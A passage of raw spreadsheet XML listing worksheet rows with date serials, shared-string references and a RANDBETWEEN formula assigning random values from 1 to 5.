      <c r="A24430" s="1">
        <v>42989.347962962966</v>
      </c>
      <c r="C24430" t="s">
        <v>1510</v>
      </c>
      <c r="E24430" t="s">
        <v>22143</v>
      </c>
      <c r="F24430">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24431" s="1">
        <v>42989.334733796299</v>
      </c>
      <c r="C24431" t="s">
        <v>10</v>
      </c>
      <c r="D24431" t="s">
        <v>112</v>
      </c>
      <c r="E24431" t="s">
        <v>22144</v>
      </c>
      <c r="F24431">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24432" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24432" s="1">
        <v>42989.30265046296</v>
      </c>
      <c r="C24432" t="s">
        <v>11</v>
      </c>
      <c r="E24432" s="2" t="s">
        <v>22145</v>
      </c>
      <c r="F24432">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24433" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24433" s="1">
        <v>42989.215995370374</v>
      </c>
      <c r="C24433" t="s">
        <v>71</v>
      </c>
      <c r="E24433" s="2" t="s">
        <v>22146</v>
      </c>
      <c r="F24433">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24434" s="1">
        <v>42989.197546296295</v>
      </c>
      <c r="C24434" t="s">
        <v>124</v>
      </c>
      <c r="E24434" t="s">
        <v>22147</v>
      </c>
      <c r="F24434">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24435" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24435" s="1">
        <v>42989.18005787037</v>
      </c>
      <c r="C24435" t="s">
        <v>48</v>
      </c>
      <c r="E24435" s="2" t="s">
        <v>22148</v>
      </c>
      <c r="F24435">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24436" s="1">
        <v>42989.163703703707</v>
      </c>
      <c r="C24436" t="s">
        <v>139</v>
      </c>
      <c r="E24436" t="s">
        <v>22149</v>
      </c>
      <c r="F24436">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24437" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24437" s="1">
        <v>42989.132534722223</v>
      </c>
      <c r="C24437" t="s">
        <v>10</v>
      </c>
      <c r="D24437" t="s">
        <v>17</v>
      </c>
      <c r="E24437" s="2" t="s">
        <v>22150</v>
      </c>
      <c r="F24437">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24438" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A24438" s="1">
        <v>42989.111192129632</v>
      </c>
      <c r="C24438" t="s">
        <v>189</v>
      </c>
      <c r="E24438" s="2" t="s">
        <v>22151</v>
      </c>
      <c r="F24438">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24439" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24439" s="1">
        <v>42989.097986111112</v>
      </c>
      <c r="C24439" t="s">
        <v>563</v>
      </c>
      <c r="E24439" s="2" t="s">
        <v>22152</v>
      </c>
      <c r="F24439">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24440" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A24440" s="1">
        <v>42989.090682870374</v>
      </c>
      <c r="C24440" t="s">
        <v>10</v>
      </c>
      <c r="D24440" t="s">
        <v>36</v>
      </c>
      <c r="E24440" s="2" t="s">
        <v>22153</v>
      </c>
      <c r="F24440">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24441" s="1">
        <v>42988.917708333334</v>
      </c>
      <c r="C24441" t="s">
        <v>139</v>
      </c>
      <c r="E24441" t="s">
        <v>22154</v>
      </c>
      <c r="F24441">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24442" s="1">
        <v>42988.426053240742</v>
      </c>
      <c r="C24442" t="s">
        <v>6</v>
      </c>
      <c r="D24442" t="s">
        <v>821</v>
      </c>
      <c r="E24442" t="s">
        <v>22155</v>
      </c>
      <c r="F24442">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24443" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24443" s="1">
        <v>42988.36513888889</v>
      </c>
      <c r="C24443" t="s">
        <v>118</v>
      </c>
      <c r="E24443" s="2" t="s">
        <v>22156</v>
      </c>
      <c r="F24443">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24444" s="1">
        <v>42988.147789351853</v>
      </c>
      <c r="C24444" t="s">
        <v>65</v>
      </c>
      <c r="E24444" t="s">
        <v>22157</v>
      </c>
      <c r="F24444">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24445" s="1">
        <v>42987.516458333332</v>
      </c>
      <c r="C24445" t="s">
        <v>10</v>
      </c>
      <c r="D24445" t="s">
        <v>17</v>
      </c>
      <c r="E24445" t="s">
        <v>22158</v>
      </c>
      <c r="F24445">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24446" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24446" s="1">
        <v>42987.354826388888</v>
      </c>
      <c r="C24446" t="s">
        <v>41</v>
      </c>
      <c r="E24446" s="2" t="s">
        <v>22159</v>
      </c>
      <c r="F24446">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24447" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24447" s="1">
        <v>42987.353634259256</v>
      </c>
      <c r="C24447" t="s">
        <v>41</v>
      </c>
      <c r="E24447" s="2" t="s">
        <v>22160</v>
      </c>
      <c r="F24447">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24448" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24448" s="1">
        <v>42986.679664351854</v>
      </c>
      <c r="C24448" t="s">
        <v>10</v>
      </c>
      <c r="D24448" t="s">
        <v>374</v>
      </c>
      <c r="E24448" s="2" t="s">
        <v>22161</v>
      </c>
      <c r="F24448">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24449" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24449" s="1">
        <v>42986.659155092595</v>
      </c>
      <c r="C24449" t="s">
        <v>10</v>
      </c>
      <c r="D24449" t="s">
        <v>251</v>
      </c>
      <c r="E24449" s="2" t="s">
        <v>22162</v>
      </c>
      <c r="F24449">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24450" s="1">
        <v>42986.646678240744</v>
      </c>
      <c r="C24450" t="s">
        <v>10</v>
      </c>
      <c r="D24450" t="s">
        <v>192</v>
      </c>
      <c r="E24450" t="s">
        <v>22163</v>
      </c>
      <c r="F24450">
        <f t="shared" ref="F24450:F24513" ca="1" si="382">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="24451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24451" s="1">
        <v>42986.638668981483</v>
      </c>
      <c r="C24451" t="s">
        <v>10</v>
      </c>
      <c r="D24451" t="s">
        <v>713</v>
      </c>
      <c r="E24451" t="s">
        <v>22164</v>
      </c>
      <c r="F24451">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24452" s="1">
        <v>42986.632604166669</v>
      </c>
      <c r="C24452" t="s">
        <v>6</v>
      </c>
      <c r="D24452" t="s">
        <v>25</v>
      </c>
      <c r="E24452" t="s">
        <v>22165</v>
      </c>
      <c r="F24452">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24453" s="1">
        <v>42986.627962962964</v>
      </c>
      <c r="C24453" t="s">
        <v>10</v>
      </c>
      <c r="D24453" t="s">
        <v>330</v>
      </c>
      <c r="E24453" t="s">
        <v>22166</v>
      </c>
      <c r="F24453">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24454" s="1">
        <v>42986.611724537041</v>
      </c>
      <c r="C24454" t="s">
        <v>6</v>
      </c>
      <c r="D24454" t="s">
        <v>25</v>
      </c>
      <c r="E24454" t="s">
        <v>22167</v>
      </c>
      <c r="F24454">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24455" s="1">
        <v>42986.602233796293</v>
      </c>
      <c r="C24455" t="s">
        <v>6</v>
      </c>
      <c r="D24455" t="s">
        <v>194</v>
      </c>
      <c r="E24455" t="s">
        <v>22168</v>
      </c>
      <c r="F24455">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24456" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24456" s="1">
        <v>42986.572488425925</v>
      </c>
      <c r="C24456" t="s">
        <v>260</v>
      </c>
      <c r="E24456" s="2" t="s">
        <v>22169</v>
      </c>
      <c r="F24456">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24457" s="1">
        <v>42986.55908564815</v>
      </c>
      <c r="C24457" t="s">
        <v>10</v>
      </c>
      <c r="D24457" t="s">
        <v>11</v>
      </c>
      <c r="E24457" t="s">
        <v>22170</v>
      </c>
      <c r="F24457">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24458" s="1">
        <v>42986.536736111113</v>
      </c>
      <c r="C24458" t="s">
        <v>6</v>
      </c>
      <c r="D24458" t="s">
        <v>25</v>
      </c>
      <c r="E24458" t="s">
        <v>22171</v>
      </c>
      <c r="F24458">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24459" s="1">
        <v>42986.513275462959</v>
      </c>
      <c r="C24459" t="s">
        <v>10</v>
      </c>
      <c r="D24459" t="s">
        <v>494</v>
      </c>
      <c r="E24459" t="s">
        <v>22172</v>
      </c>
      <c r="F24459">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24460" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24460" s="1">
        <v>42986.495787037034</v>
      </c>
      <c r="C24460" t="s">
        <v>3049</v>
      </c>
      <c r="E24460" s="2" t="s">
        <v>22173</v>
      </c>
      <c r="F24460">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24461" s="1">
        <v>42986.484733796293</v>
      </c>
      <c r="C24461" t="s">
        <v>48</v>
      </c>
      <c r="E24461" t="s">
        <v>22174</v>
      </c>
      <c r="F24461">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24462" s="1">
        <v>42986.482557870368</v>
      </c>
      <c r="C24462" t="s">
        <v>10</v>
      </c>
      <c r="D24462" t="s">
        <v>6</v>
      </c>
      <c r="E24462" t="s">
        <v>22175</v>
      </c>
      <c r="F24462">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24463" s="1">
        <v>42986.46402777778</v>
      </c>
      <c r="C24463" t="s">
        <v>10</v>
      </c>
      <c r="D24463" t="s">
        <v>41</v>
      </c>
      <c r="E24463" t="s">
        <v>22176</v>
      </c>
      <c r="F24463">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24464" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A24464" s="1">
        <v>42986.450474537036</v>
      </c>
      <c r="C24464" t="s">
        <v>10</v>
      </c>
      <c r="D24464" t="s">
        <v>6</v>
      </c>
      <c r="E24464" s="2" t="s">
        <v>22177</v>
      </c>
      <c r="F24464">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24465" s="1">
        <v>42986.446273148147</v>
      </c>
      <c r="C24465" t="s">
        <v>65</v>
      </c>
      <c r="E24465" t="s">
        <v>22178</v>
      </c>
      <c r="F24465">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24466" s="1">
        <v>42986.439143518517</v>
      </c>
      <c r="C24466" t="s">
        <v>10</v>
      </c>
      <c r="D24466" t="s">
        <v>89</v>
      </c>
      <c r="E24466" t="s">
        <v>22179</v>
      </c>
      <c r="F24466">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24467" s="1">
        <v>42986.436157407406</v>
      </c>
      <c r="C24467" t="s">
        <v>71</v>
      </c>
      <c r="E24467" t="s">
        <v>22180</v>
      </c>
      <c r="F24467">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24468" s="1">
        <v>42986.400914351849</v>
      </c>
      <c r="C24468" t="s">
        <v>48</v>
      </c>
      <c r="E24468" t="s">
        <v>22181</v>
      </c>
      <c r="F24468">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24469" s="1">
        <v>42986.396481481483</v>
      </c>
      <c r="C24469" t="s">
        <v>124</v>
      </c>
      <c r="E24469" t="s">
        <v>22182</v>
      </c>
      <c r="F24469">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24470" s="1">
        <v>42986.391041666669</v>
      </c>
      <c r="C24470" t="s">
        <v>10</v>
      </c>
      <c r="D24470" t="s">
        <v>178</v>
      </c>
      <c r="E24470" t="s">
        <v>22183</v>
      </c>
      <c r="F24470">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24471" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24471" s="1">
        <v>42986.34983796296</v>
      </c>
      <c r="C24471" t="s">
        <v>10</v>
      </c>
      <c r="D24471" t="s">
        <v>374</v>
      </c>
      <c r="E24471" s="2" t="s">
        <v>22184</v>
      </c>
      <c r="F24471">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24472" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24472" s="1">
        <v>42986.319722222222</v>
      </c>
      <c r="C24472" t="s">
        <v>50</v>
      </c>
      <c r="E24472" s="2" t="s">
        <v>22185</v>
      </c>
      <c r="F24472">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24473" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A24473" s="1">
        <v>42986.309328703705</v>
      </c>
      <c r="C24473" t="s">
        <v>97</v>
      </c>
      <c r="E24473" s="2" t="s">
        <v>22186</v>
      </c>
      <c r="F24473">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24474" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24474" s="1">
        <v>42986.296076388891</v>
      </c>
      <c r="C24474" t="s">
        <v>41</v>
      </c>
      <c r="E24474" s="2" t="s">
        <v>22187</v>
      </c>
      <c r="F24474">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24475" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24475" s="1">
        <v>42986.272256944445</v>
      </c>
      <c r="C24475" t="s">
        <v>41</v>
      </c>
      <c r="E24475" s="2" t="s">
        <v>22188</v>
      </c>
      <c r="F24475">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24476" s="1">
        <v>42986.195011574076</v>
      </c>
      <c r="C24476" t="s">
        <v>48</v>
      </c>
      <c r="E24476" t="s">
        <v>22189</v>
      </c>
      <c r="F24476">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24477" s="1">
        <v>42986.179479166669</v>
      </c>
      <c r="C24477" t="s">
        <v>41</v>
      </c>
      <c r="E24477" t="s">
        <v>22190</v>
      </c>
      <c r="F24477">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24478" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24478" s="1">
        <v>42986.122685185182</v>
      </c>
      <c r="C24478" t="s">
        <v>471</v>
      </c>
      <c r="E24478" s="2" t="s">
        <v>22191</v>
      </c>
      <c r="F24478">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24479" s="1">
        <v>42986.120069444441</v>
      </c>
      <c r="C24479" t="s">
        <v>471</v>
      </c>
      <c r="F24479">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24480" s="1">
        <v>42986.069409722222</v>
      </c>
      <c r="C24480" t="s">
        <v>41</v>
      </c>
      <c r="F24480">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24481" s="1">
        <v>42986.064375000002</v>
      </c>
      <c r="C24481" t="s">
        <v>41</v>
      </c>
      <c r="E24481" t="s">
        <v>22192</v>
      </c>
      <c r="F24481">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24482" s="1">
        <v>42986.043483796297</v>
      </c>
      <c r="C24482" t="s">
        <v>41</v>
      </c>
      <c r="F24482">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24483" s="1">
        <v>42986.043391203704</v>
      </c>
      <c r="C24483" t="s">
        <v>41</v>
      </c>
      <c r="F24483">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24484" s="1">
        <v>42986.040983796294</v>
      </c>
      <c r="C24484" t="s">
        <v>41</v>
      </c>
      <c r="F24484">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24485" s="1">
        <v>42986.040578703702</v>
      </c>
      <c r="C24485" t="s">
        <v>41</v>
      </c>
      <c r="F24485">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24486" s="1">
        <v>42986.039652777778</v>
      </c>
      <c r="C24486" t="s">
        <v>41</v>
      </c>
      <c r="E24486" t="s">
        <v>22193</v>
      </c>
      <c r="F24486">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24487" s="1">
        <v>42985.975428240738</v>
      </c>
      <c r="C24487" t="s">
        <v>10</v>
      </c>
      <c r="D24487" t="s">
        <v>6</v>
      </c>
      <c r="E24487" t="s">
        <v>22194</v>
      </c>
      <c r="F24487">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24488" s="1">
        <v>42985.92460648148</v>
      </c>
      <c r="C24488" t="s">
        <v>140</v>
      </c>
      <c r="D24488" t="s">
        <v>46</v>
      </c>
      <c r="E24488" t="s">
        <v>22195</v>
      </c>
      <c r="F24488">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24489" s="1">
        <v>42985.894120370373</v>
      </c>
      <c r="C24489" t="s">
        <v>140</v>
      </c>
      <c r="D24489" t="s">
        <v>197</v>
      </c>
      <c r="E24489" t="s">
        <v>22196</v>
      </c>
      <c r="F24489">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24490" s="1">
        <v>42985.806875000002</v>
      </c>
      <c r="C24490" t="s">
        <v>10</v>
      </c>
      <c r="D24490" t="s">
        <v>46</v>
      </c>
      <c r="E24490" t="s">
        <v>22197</v>
      </c>
      <c r="F24490">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24491" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24491" s="1">
        <v>42985.761828703704</v>
      </c>
      <c r="C24491" t="s">
        <v>71</v>
      </c>
      <c r="E24491" s="2" t="s">
        <v>22198</v>
      </c>
      <c r="F24491">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24492" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24492" s="1">
        <v>42985.746562499997</v>
      </c>
      <c r="C24492" t="s">
        <v>10</v>
      </c>
      <c r="D24492" t="s">
        <v>192</v>
      </c>
      <c r="E24492" s="2" t="s">
        <v>22199</v>
      </c>
      <c r="F24492">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24493" s="1">
        <v>42985.731666666667</v>
      </c>
      <c r="C24493" t="s">
        <v>10</v>
      </c>
      <c r="D24493" t="s">
        <v>494</v>
      </c>
      <c r="E24493" t="s">
        <v>22200</v>
      </c>
      <c r="F24493">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24494" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24494" s="1">
        <v>42985.715914351851</v>
      </c>
      <c r="C24494" t="s">
        <v>6</v>
      </c>
      <c r="D24494" t="s">
        <v>25</v>
      </c>
      <c r="E24494" s="2" t="s">
        <v>22201</v>
      </c>
      <c r="F24494">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24495" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24495" s="1">
        <v>42985.703645833331</v>
      </c>
      <c r="C24495" t="s">
        <v>10</v>
      </c>
      <c r="D24495" t="s">
        <v>667</v>
      </c>
      <c r="E24495" s="2" t="s">
        <v>22202</v>
      </c>
      <c r="F24495">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24496" s="1">
        <v>42985.615266203706</v>
      </c>
      <c r="C24496" t="s">
        <v>41</v>
      </c>
      <c r="E24496" t="s">
        <v>22203</v>
      </c>
      <c r="F24496">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24497" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24497" s="1">
        <v>42985.615162037036</v>
      </c>
      <c r="C24497" t="s">
        <v>6</v>
      </c>
      <c r="D24497" t="s">
        <v>25</v>
      </c>
      <c r="E24497" s="2" t="s">
        <v>22204</v>
      </c>
      <c r="F24497">
        <f t="shared" ca="1" si="382"/>
        <v>3</v>
      </c>
    </row>
    <row r="24498" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24498" s="1">
        <v>42985.6093287037</v>
      </c>
      <c r="C24498" t="s">
        <v>10</v>
      </c>
      <c r="D24498" t="s">
        <v>107</v>
      </c>
      <c r="E24498" s="2" t="s">
        <v>22205</v>
      </c>
      <c r="F24498">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24499" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24499" s="1">
        <v>42985.573599537034</v>
      </c>
      <c r="C24499" t="s">
        <v>10</v>
      </c>
      <c r="D24499" t="s">
        <v>112</v>
      </c>
      <c r="E24499" s="2" t="s">
        <v>22206</v>
      </c>
      <c r="F24499">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24500" s="1">
        <v>42985.567523148151</v>
      </c>
      <c r="C24500" t="s">
        <v>10</v>
      </c>
      <c r="D24500" t="s">
        <v>163</v>
      </c>
      <c r="E24500" t="s">
        <v>22207</v>
      </c>
      <c r="F24500">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24501" s="1">
        <v>42985.54896990741</v>
      </c>
      <c r="C24501" t="s">
        <v>144</v>
      </c>
      <c r="E24501" t="s">
        <v>22208</v>
      </c>
      <c r="F24501">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24502" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24502" s="1">
        <v>42985.52752314815</v>
      </c>
      <c r="C24502" t="s">
        <v>41</v>
      </c>
      <c r="E24502" s="2" t="s">
        <v>22209</v>
      </c>
      <c r="F24502">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24503" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24503" s="1">
        <v>42985.517500000002</v>
      </c>
      <c r="C24503" t="s">
        <v>1501</v>
      </c>
      <c r="E24503" s="2" t="s">
        <v>22210</v>
      </c>
      <c r="F24503">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24504" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24504" s="1">
        <v>42985.516145833331</v>
      </c>
      <c r="C24504" t="s">
        <v>71</v>
      </c>
      <c r="E24504" s="2" t="s">
        <v>22210</v>
      </c>
      <c r="F24504">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24505" s="1">
        <v>42985.514513888891</v>
      </c>
      <c r="C24505" t="s">
        <v>260</v>
      </c>
      <c r="E24505" t="s">
        <v>22211</v>
      </c>
      <c r="F24505">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24506" s="1">
        <v>42985.484571759262</v>
      </c>
      <c r="C24506" t="s">
        <v>10</v>
      </c>
      <c r="D24506" t="s">
        <v>112</v>
      </c>
      <c r="E24506" t="s">
        <v>22212</v>
      </c>
      <c r="F24506">
        <f t="shared" ca="1" si="382"/>
        <v>4</v>
      </c>
    </row>
    <row r="24507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24507" s="1">
        <v>42985.481481481482</v>
      </c>
      <c r="C24507" t="s">
        <v>10</v>
      </c>
      <c r="D24507" t="s">
        <v>36</v>
      </c>
      <c r="E24507" t="s">
        <v>22213</v>
      </c>
      <c r="F24507">
        <f t="shared" ca="1" si="382"/>
        <v>2</v>
      </c>
    </row>
    <row r="24508" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24508" s="1">
        <v>42985.478344907409</v>
      </c>
      <c r="C24508" t="s">
        <v>10</v>
      </c>
      <c r="D24508" t="s">
        <v>23</v>
      </c>
      <c r="E24508" s="2" t="s">
        <v>22214</v>
      </c>
      <c r="F24508">
        <f t="shared" ca="1" si="382"/>
        <v>5</v>
      </c>
    </row>
    <row r="24509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24509" s="1">
        <v>42985.477106481485</v>
      </c>
      <c r="C24509" t="s">
        <v>6</v>
      </c>
      <c r="D24509" t="s">
        <v>25</v>
      </c>
      <c r="E24509" t="s">
        <v>22215</v>
      </c>
      <c r="F24509">
        <f t="shared" ca="1" si="382"/>
        <v>1</v>
      </c>
    </row>
    <row r="24510" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24510" s="1">
        <v>42985.471898148149</v>
      </c>
      <c r="C24510" t="s">
        <v>10</v>
      </c>
      <c r="D24510" t="s">
        <v>494</v>
      </c>
